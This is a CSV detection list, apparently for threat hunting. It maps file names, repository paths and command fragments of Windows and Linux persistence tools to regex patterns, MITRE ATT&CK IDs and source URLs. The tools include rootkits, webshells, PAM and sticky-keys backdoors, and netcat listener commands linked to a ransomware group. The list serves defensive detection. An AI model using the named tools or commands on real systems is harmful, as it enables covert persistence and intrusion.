"*/JumpSession_BOF.git*",".{0,1000}\/JumpSession_BOF\.git.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","78","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z"
"*/lib/systemd/system/evil.service*",".{0,1000}\/lib\/systemd\/system\/evil\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/linpeas.sh*",".{0,1000}\/linpeas\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*/linux-exploit-suggester.sh*",".{0,1000}\/linux\-exploit\-suggester\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/linux-pam-backdoor.git*",".{0,1000}\/linux\-pam\-backdoor\.git.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","#linux","N/A","10","4","320","83","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*/logon_backdoor.git*",".{0,1000}\/logon_backdoor\.git.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*/master/JunctionFolder/*",".{0,1000}\/master\/JunctionFolder\/.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*/nc64 -i *",".{0,1000}\/nc64\s\-i\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nc64 -lvp *",".{0,1000}\/nc64\s\-lvp\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nc64 -zv *",".{0,1000}\/nc64\s\-zv\s.{0,1000}","greyware_tool_keyword","nc","backdoor with netcat - used by the Ransomware group Dispossessor","T1547.001 - T1059.003 - T1105","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/ntlmtransport.go*",".{0,1000}\/ntlmtransport\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/Offensive-Netsh-Helper.git*",".{0,1000}\/Offensive\-Netsh\-Helper\.git.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z"
"*/Office-Persistence.git*",".{0,1000}\/Office\-Persistence\.git.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*/OfficePersistence.ps1*",".{0,1000}\/OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*/Office-Persistence/master/calc.ppa*",".{0,1000}\/Office\-Persistence\/master\/calc\.ppa.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"*/PANIX.git*",".{0,1000}\/PANIX\.git.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/panix.sh --*",".{0,1000}\/panix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/perl-reverse-shell.pl*",".{0,1000}\/perl\-reverse\-shell\.pl.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","",""
"*/persistence_demos.git*",".{0,1000}\/persistence_demos\.git.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","N/A","7","3","219","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z"
"*/Persistence-Accessibility-Features.git*",".{0,1000}\/Persistence\-Accessibility\-Features\.git.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*/php-backdoor.php*",".{0,1000}\/php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","",""
"*/PoshADCS.git*",".{0,1000}\/PoshADCS\.git.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*/PowerLurk.git*",".{0,1000}\/PowerLurk\.git.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*/PowerLurk.ps1*",".{0,1000}\/PowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*/processhacker-*-bin.zip*",".{0,1000}\/processhacker\-.{0,1000}\-bin\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/processhacker/files/latest/download*",".{0,1000}\/processhacker\/files\/latest\/download.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/PSpersist.git*",".{0,1000}\/PSpersist\.git.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
"*/r77-rootkit.git*",".{0,1000}\/r77\-rootkit\.git.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*/r77-x64.dll*",".{0,1000}\/r77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*/r77-x86.dll*",".{0,1000}\/r77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*/RedPersist.exe*",".{0,1000}\/RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*/RedPersist.git*",".{0,1000}\/RedPersist\.git.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*/releases/download/panix-v*/panix.sh*",".{0,1000}\/releases\/download\/panix\-v.{0,1000}\/panix\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*/rid_hijack.py*",".{0,1000}\/rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*/RID-Hijacking.git*",".{0,1000}\/RID\-Hijacking\.git.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*/rootkiter/Binary-files*",".{0,1000}\/rootkiter\/Binary\-files.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*/ropbuffers.go*",".{0,1000}\/ropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/ruler --domain *",".{0,1000}\/ruler\s\-\-domain\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/ruler --email *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/ruler --url*",".{0,1000}\/ruler\s\-\-url.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/rulerforms.go*",".{0,1000}\/rulerforms\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*/Sandman.exe*",".{0,1000}\/Sandman\.exe.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*/sandman_server.py*",".{0,1000}\/sandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*/SandmanBackdoorTimeProvider.dll*",".{0,1000}\/SandmanBackdoorTimeProvider\.dll.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*/Sandman-master.zip*",".{0,1000}\/Sandman\-master\.zip.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","1","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*/sbin/dropbear*",".{0,1000}\/sbin\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*/ScheduleRunner.git*",".{0,1000}\/ScheduleRunner\.git.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*/SchTask.zip*",".{0,1000}\/SchTask\.zip.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*/SchTask_0x727.git*",".{0,1000}\/SchTask_0x727\.git.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*/SchTask_0x727/*",".{0,1000}\/SchTask_0x727\/.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*/sdb-explorer.exe*",".{0,1000}\/sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*/Seatbelt.git*",".{0,1000}\/Seatbelt\.git.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*/Seatbelt/Commands*",".{0,1000}\/Seatbelt\/Commands.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*/SharPersist.git*",".{0,1000}\/SharPersist\.git.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*/SharpEventPersist.git*",".{0,1000}\/SharpEventPersist\.git.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*/SharpPersistSD.dll*",".{0,1000}\/SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*/SharpPersistSD.git*",".{0,1000}\/SharpPersistSD\.git.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*/SharpSC.exe*",".{0,1000}\/SharpSC\.exe.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*/SharpSC.git*",".{0,1000}\/SharpSC\.git.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*/SharpStay.git*",".{0,1000}\/SharpStay\.git.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*/SharpStay/*",".{0,1000}\/SharpStay\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*/ShimDB.git*",".{0,1000}\/ShimDB\.git.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*/signer-exe.py*",".{0,1000}\/signer\-exe\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z"
"*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","N/A","10","","N/A","","",""
"*/stickykey.ps1*",".{0,1000}\/stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*/Stickykeys.sh*",".{0,1000}\/Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*/Suborner.git*",".{0,1000}\/Suborner\.git.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","468","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z"
"*/sunder.exe*",".{0,1000}\/sunder\.exe.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","1","N/A","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*/tmp/auto-priv-cgroup*",".{0,1000}\/tmp\/auto\-priv\-cgroup.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*/tmp/auto-priv-mountdir*",".{0,1000}\/tmp\/auto\-priv\-mountdir.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
